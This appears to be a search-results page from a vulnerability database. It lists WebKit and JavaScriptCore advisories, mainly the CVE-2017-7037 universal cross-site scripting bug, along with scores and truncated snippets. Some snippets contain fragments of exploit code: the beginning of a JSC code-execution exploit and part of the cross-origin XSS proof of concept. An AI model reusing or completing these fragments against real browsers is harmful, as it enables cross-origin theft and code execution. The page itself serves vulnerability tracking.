
7 matches found

exploitpack
added 2019/11/05 12:0 a.m., 19 views

WebKit - Universal XSS in JSObject::putInlineSlow and JSValue::putToPrimitive

WebKit - Universal XSS in JSObject::putInlineSlow and JSValue::putToPrimitive VULNERABILITY DETAILS bool JSObject::putInlineSlowExecState exec, PropertyName propertyName, JSValue value, PutPropertySlot& slot ASSERT!isThisValueAlteredslot, this; VM& vm = exec-vm; auto scope = DECLARETHROWSCOPEvm;...

AI score: 0.3
Exploits: 0

Exploit DB
added 2019/07/30 12:0 a.m., 233 views

macOS / iOS JavaScriptCore - JSValue Use-After-Free in ValueProfiles

While fuzzing JSC, I encountered the following JS program which crashes JSC from current HEAD and release /System/Library/Frameworks/JavaScriptCore.framework/Resources/jsc: // Run with --useConcurrentJIT=false --thresholdForJITAfterWarmUp=10 function fullGC for var i = 0; i 10; i++ new...

AI score: 7.4
Exploits: 0

exploitpack
added 2018/07/11 12:0 a.m., 26 views

JavaScript Core - Arbitrary Code Execution

JavaScript Core - Arbitrary Code Execution // Load Int library, thanks saelo! load'util.js'; load'int64.js'; // Helpers to convert from float to in a few random places var conva = new ArrayBuffer8; var convf = new Float64Arrayconva; var convi = new Uint32Arrayconva; var convi8 = new...

AI score: 0.3
Exploits: 0

seebug.org
added 2017/07/27 12:0 a.m., 41 views

WebKit: JSC: UXSS via JSObject::putInlineSlow and JSValue::putToPrimitive (CVE-2017-7037)

JSObject::putInlineSlow and JSValue::putToPrimitive use getPrototypeDirect instead of getPrototype to get an object's prototype. So JSDOMWindow::getPrototype, which checks the Same Origin Policy, is not called. The PoC shows how to call a setter of another origin's object. PoC 1 -...

CVSS: 6.8, AI score: 8.2, EPSS: 0.03473
Exploits: 3

0day.today
added 2017/07/25 12:0 a.m., 39 views

WebKit JSC JSObject::putInlineSlow / JSValue::putToPrimitive XSS Vulnerability

WebKit JSC JSObject::putInlineSlow and JSValue::putToPrimitive suffer from a universal cross site scripting vulnerability. WebKit: JSC: UXSS via JSObject::putInlineSlow and JSValue::putToPrimitive CVE-2017-7037 JSObject::putInlineSlow and JSValue::putToPrimitive use getPrototypeDirect instead of...

CVSS: 6.8, AI score: 8, EPSS: 0.03473
Exploits: 3

Packet Storm
added 2017/07/25 12:0 a.m., 43 views

WebKit JSC JSObject::putInlineSlow / JSValue::putToPrimitive XSS

WebKit: JSC: UXSS via JSObject::putInlineSlow and JSValue::putToPrimitive CVE-2017-7037 JSObject::putInlineSlow and JSValue::putToPrimitive use getPrototypeDirect instead of getPrototype to get an object's prototype. So JSDOMWindow::getPrototype which checks the Same Origin Policy is not called...

CVSS: 6.8, AI score: 7.6, EPSS: 0.03473
Exploits: 3

Exploit DB
added 2017/07/25 12:0 a.m., 31 views

WebKit JSC - 'JSObject::putInlineSlow' / 'JSValue::putToPrimitive' Universal Cross-Site Scripting

let f = document.body.appendChilddocument.createElement'iframe'; let loc = f.contentWindow.location; f.onload = = let a = 1.2; a.proto.proto = f.contentWindow; a'test' = toString: function arguments.callee.caller.constructor'alertlocation'; ; ; f.src = 'data:text/html,' +...

AI score: 7.4
Exploits: 0